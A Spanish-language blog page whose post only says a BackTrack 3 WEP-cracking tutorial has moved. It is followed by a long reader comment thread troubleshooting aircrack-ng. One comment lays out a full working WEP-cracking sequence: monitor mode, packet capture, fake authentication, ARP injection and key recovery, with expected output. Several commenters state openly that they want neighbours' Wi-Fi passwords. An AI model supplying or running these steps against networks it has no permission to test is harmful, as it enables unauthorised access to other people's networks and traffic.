Saltar al contenido

Crackear una wep con BackTrack 3 (tan facil poner en jaque a la inalambrica)

julio 31, 2008

Hemos mudado esta entrada al nuevo blog (Quanaxoft), para verla da click en el siguiente enlace: http://www.quanaxoft.com/blog/2008/07/31/crackear-una-wep-con-backtrack-3-tan-facil-poner-en-jaque-a-la-inalambrica/

Disculpe las molestias :)

37 comentarios leave one →
  1. agosto 28, 2008 6:16 pm

    Thank you your video is very good, but when we are executing aircrack, it appears a message that says: Opening wep123-01.cap, Killedg packets, please wait….. what can we do ?????

  2. agosto 28, 2008 9:03 pm

    i dont know actually … maybe wait? lol… xD

    i didnt have a good answer but u can go to the forums of remote-exploit looking for a good one: http://forums.remote-exploit.org/

    good luck!

  3. agosto 28, 2008 10:07 pm

    Well but i have a laptop toshiva with a chipset atheros do you think it will work????? that’s the only part where we have problems!!! but still thank you for your video!!!

  4. agosto 29, 2008 2:16 am

    well… maybe… (i believe that yes… ) but i suggest that make a visit to this page: http://www.aircrack-ng.org/doku.php?id=compatibility_drivers

    i actually use an usb wireless card :)

  5. agosto 30, 2008 12:39 am

    How much is a wireless card and where can buy it???? thanks, i hope it works

  6. agosto 30, 2008 3:27 pm

    mmm… well maybe between $20 and $35 dollars… (mine’s cost $300 pesos)… u can go to any pc shop or … ebay.com, mercadolibre.com.mx…

    but… like u say before u should check the type of chipset and if u can use it on linux (drivers and all that kind of thinks)…

    if helps, with my usb card i only had to put on and run the live cd of backtrack 2 (in backtrack 3 beta doesnt work, but i havent check if runs well on final version of backtrack 3)…

  7. agosto 31, 2008 12:10 am

    ok what chipset would you advice me to buy, i have windows vista and backtrack 3 ??? Thanks

  8. septiembre 1, 2008 5:58 am

    well… i have a 802.11g Wireless USB 2.0 Adapter, REALTEK 8187 Chipset … but i only probe it on Windows XP and Backtrack 2 … i dont know if i can suggest to you to buy it, but its what i use :)

    You can see this adapter here:
    http://www.meritline.com/ieee-802-11g-wireless-mini-usb-pen-drive.html

  9. Cuervo Latino Enlace permanente
    septiembre 19, 2008 12:17 am

    Que tal!

    Yo acabo de descargar BackTrack (la ultima version) y lo queme en un disco como una imagen, pero a usarla pe pide el login y el pasword, uso los que son por default he intento iniciar la interfaz grafica con startx, pero no apoarece nada, solo una pantalla que con el sistema de archivos.

    Espero que me puedas ayudar o recomendar algun tutorial, te lo agradeceria mucho.

  10. septiembre 19, 2008 2:32 am

    K onda cuervo… pues… no se si hayas intentado hacer primero:

    #xconf
    #startx

    Eso debería funcionar… bueno, asi pasaba con el BackTrack 2 para que no hubiera lios… podrías también darle una checada a mis “Enlaces Interesantes” en particular checa el de remote-exploit.org… o busca en el foro de remote-exploit más información (incluso podrías preguntar ahi para resolver las dudas que te vayan surgiendo):

    http://forums.remote-exploit.org/

    De lo poco que pueda ayudar ya sabes… avisame cuando resuelvas el problema y dime como lo hiciste jaja… o si sigues con lios pues igual lo platicamos para ver que solución encontramos!

    salu2!

  11. septiembre 21, 2008 8:53 pm

    que onda richi no sabia que hablabas espanol. olle mira no se que tarjeta usb comprar cual me recomiendas o sino dime una tarjeta inalambrica aunque no sea usb para poder injectar con backtrack 3. o dame tu e-mail el mio es emmanuel.2706@hotmail.com agregame

  12. septiembre 22, 2008 6:45 am

    listo emmanuel, ya te agregue… a ver si de rato platikamos jaja

  13. octubre 1, 2008 7:03 pm

    que onda richie olle al instalar el cd e instalacion de tu ttarjeta usb realtek 8187 en windows automaticamente lo hace en backtrack 3???? espero tu respuesta!!

  14. octubre 6, 2008 3:47 pm

    nop, no lo hace automático… pues… mira, cuando se trata de usar el live-cd de backtrack a veces basta con que dejes conectada tu tarjeta usb para que backtrack en automatico al cargar se encargue de reconocer el dispositivo… de no ser asi se me ocurriria utilizar un driver genérico… puedes visitar los foros oficiales de backtrack para pedir mas informacion o deja un comment en alguna parte del blog para ver si encontramos solucion, salu2!

  15. diciembre 30, 2008 11:31 pm

    Que tal Yo lo intente en una lap Acer con tarjeta Broadcom y todo va bien hasta que llego al ultimo paso donde se usa el aircrack-ng en la tercer ventana por que al dar enter como que se reinicia y me abre de nuevo el sistema backtrack como si hubiera reiniciado la maquina, que sera alguien me pueder ayudar o dar orientacion, Gracias y saludos.

  16. enero 21, 2009 12:34 am

    que onda .. perfecto !!! si se pudo :d , nadamas que yo no lo ise desde BACKTRACK o WIFISLAX, sino desde UBUNTU 8.10 solamente descrage de los repositorios AIRCRACK apt-get install aircrack macchenager y listo .. segui todos los pasos !!! muchas gracias !!!! nos vemos !
    yo emplie una tarjeta de red inalambrica para PCI REALTEK RTL 8087 y anduvo todo a la perfeccion !!! gracias !!

  17. enero 23, 2009 6:26 pm

    Hola. Me ha ligado toda la técnica menos la última, pues cuando utilizo el aircrack-ng -n 64 -b (bssid) wep123-01.cap me pide que ingrese un nombre de diccionario. Qué le puedo hacer. Tengo una tarjeta inalámbrica SATRA SA-WN551G de chipset Atheros.
    Gracias por la ayuda.

  18. enero 26, 2009 11:34 pm

    que bueno que nos das esa info!!! me alegro que funcionara… salu2!

  19. enero 30, 2009 4:26 pm

    Hola,,mira,,hago todo pero al llegar a este punto me da error,,vamos que no quiere ponermelo en modo monitor:
    root@sku-laptop:/home/sku# airmon-ng start wlan0

    Interface Chipset Driver

    wlan0 iwl3945 – [phy0]/usr/local/sbin/airmon-ng: 856: cannot create /sys/class/ieee80211/phy0/add_iface: Directory nonexistent
    Error for wireless request “Set Mode” (8B06) :
    SET failed on device mon0 ; No such device.
    mon0: ERROR mientras se obtenían las banderas de interfaz: No existe el dispositivo

    (monitor mode enabled on mon0)

  20. abril 18, 2009 3:29 pm

    hola que tal ? yo tuve un problema a la hora de hacer el airodump con el canal y la bssid, m marca el error ->”airodump-ng –help” for help.<-, he revisado bien paso a paso las instrucciones, los comandos,y no logro hacer que se quite, m puedes ayudar?

  21. mayo 29, 2009 8:49 am

    Hola Richie,

    Tengo un problema, todo va bien hasta el momento de hacer que se generen los #DATA, se quedan en ceros, y obvio al llegar al paso del aircrack pues el archivo donde se supone se guerdaria todo no tiene nada, ya que no se genero ningun #DATA, alguna sugerencia, comot e comento, todo marcha bien, no hay error en ningun paso, solo es esa parte, alguna opinion acerca de esta situacion?
    gracias.

  22. Sephiroth Enlace permanente
    junio 5, 2009 6:08 pm

    Hola
    quisiera saber si el backtrack trabaja con broadcoms o railink?
    y si me pudieres dar la modificacion o comandos nuevos a utilizar
    gracias.

  23. junio 9, 2009 7:33 am

    ya lo he intentado y ha funcionado, pero al llegar al paso

    # airmon-ng start wlan0
    (iniciar despeus del macchanger)

    el wireless deja de detectar las conexiones y no obtengo ningun paquete
    ayuda porfavor

  24. agosto 24, 2009 11:40 pm

    hola , tengo una tarjeta satra y quisiera saber los pasos para hackea redes que estan llenas y con seguridad
    gracias

  25. Daniel Guzman Enlace permanente
    septiembre 24, 2009 3:13 am

    yo consegui que el Backtrack 3 USB funcione a la perfeccion con una Acer aspire 4315 con tarjeta de red atheros 5007EG sin problemas, solo que los pasos que sigo para trabajar son los siguientes:
    airmon-ng start wifi0 (Pone la tarjeta en modo monitor)
    airodump-ng ath1 (Busca redes disponibles y muestra AP MAC)
    airodump-ng -c [channel] –bssid [AP MAC] -w [filename] ath1
    donde (no hay que poner los corchetes):
    channel: es el canal
    AP MAC es la direccion mac 00:00:00:00:00:00
    filename: es el nombre de archivo que le quieras dar, por ejemplo: casa

    Abres otra terminal
    aireplay-ng –fakeauth 0 -e [AP SSID] -a [AP MAC] ath1
    AP ASSID es el nombre de la red o punto de acceso

    tiene que salir esto:
    Sending Authentication Request
    authentication successful
    Sending association request
    Association successful

    Empiezas a inyectar:
    aireplay-ng -3 -b [AP MAC] ath1 -x250
    La columna DATA de la primera terminal empieza a subir, cuando llegue a 5000 abre una tercera terminal

    aircrack-ng -z -b [AP MAC] [filename*.cap]
    en filename debes poner el nombre del archivo que escogiste antes, no se olvide poner el asterisco: casa*.cap (el programa empieza a comprobar los archivos DATA)
    Si sale: failed wait to 10000 ivs solo teclea ctrl C y sale BT abajo, aprieta flecha hacia arriba para que vuelva a escribir lo mismo, espera hasta que la columnaDATA llegue a 10000 y aprieta enter, espera un poco y ya tienes lo que buscas

  26. septiembre 26, 2009 8:10 pm

    eY k dices richie?! espero que sigas leyendo esto…xD a ver si me puedes ayudar tio

    Lo primero es que me tengo que comprar (que requisitos minimos tiene que tener lo del wifi…xD)

    y lo segundo es, que si se puede hacer desde windows (vista).

    Espero que lo leas lokoooo! Un saludo.

    Si puedes agregarme mejor …
    Aston.Ibiza@gmail.com

    Gracias de antemano Suerte!

  27. noviembre 2, 2009 2:00 am

    Hola, yo en el segundo paso, donde deveria aparecer : monitor mode disable, no me aparece y me sigue apareciendo iwal que el anterior, dicho se ade paos tengo una usb con chipset rt73, y por consiguiente, los demas pasos no me funcionan pues me sale que : No such device…. asiq ue no puedo continuar, algo que este haciendo mal? o que me recomiendan,? gracias

  28. noviembre 26, 2009 5:35 pm

    Buen material para uno de mis futuros proyectos de seguridad en redes inalámbricas, gracias :D

  29. marzo 10, 2010 8:00 pm

    quisiera qe algun experto de ustedes se dicte aayudarme con backtrack 3 usb ya logre hacer que bootee y qe inicie pero eso de meter coandos no se me facilta quisiera qe me yuden con e script qe lo transforma en numeros (opcciones) (inssisos) en vez de comandos

  30. marzo 15, 2010 8:43 pm

    Pos ami me jalo perfecto, averigue mi propia clave jajaja… Lo intente con la de mi vecino y no funciono :-(
    Creo que debe estar muy cer la señal pues como solo me llea 10% de su señal tarda mucho en esperar a que llegue alos 10,000. Neee creo que hay mejores y formas mas rapidas solo que no lo encuentroooooooooooooooooooooooooooooooooooooooo

  31. abril 11, 2010 3:39 pm

    fijate vos.. que yo lo he intentado con el de mi vecino pero cuando estoy haciendo lo de los paquetes no baja la columna, osea se queda ahii tiesa y no envia cosas… no sabes a ke se debe este error??? tengo Backtrack 3 en un CD..

    espero respuestas!! gracias

  32. julio 15, 2010 10:46 am

    Hola soy nuevo en este foro.. miren yo ya obtuve claves… pero de ahi q pongo en la red inalambrica. Entra como conectado todo bacan. pero envia paquetes pero no recibe… me dijieron q es por el IP. tons ..como hago para descubrir la ip de la red inalambrica? o q pasos debo seguir… despues de conseguir una clave?—- AYUDENME POR FAVOR..!!

  33. julio 15, 2010 10:51 am

    Hola soy nuevo en este foro.. miren yo ya obtuve claves… pero de ahi q pongo en la red inalambrica. Entra como conectado todo bacan. pero envia paquetes pero no recibe… me dijieron q es por el IP. tons ..como hago para descubrir la ip de la red inalambrica? o q pasos debo seguir… despues de conseguir una clave?—- AYUDENME POR FAVOR..!!

  34. octubre 18, 2010 4:48 pm

    hola!, ps yo tengo el programa e segudo los pasos pero hay uno q no me sale y si lo ago al final el program me dice q el password está incorecto. c q el video esta bien pero cual qier cosa so podrias comunicarte con migo ps t dejo mi email

    peca_p@yahoo.com

  35. noviembre 6, 2010 2:27 am

    la neta si se puede pero lo malo es q no encuentro un linux compatible para mi tarjeta de red la cual es Adaptador de red Broadcom 802.11g su me ayudaran se los agradeseria para poder tener las contraseñas de los moden de mis besinos

Trackbacks

  1. Crackear inalámbrica (WEP) en Debian « Richie Blog
  2. Crackear una WEP: Método genérico - ApunTux

Deja un comentario

Seguir

Recibe cada nueva publicación en tu buzón de correo electrónico.

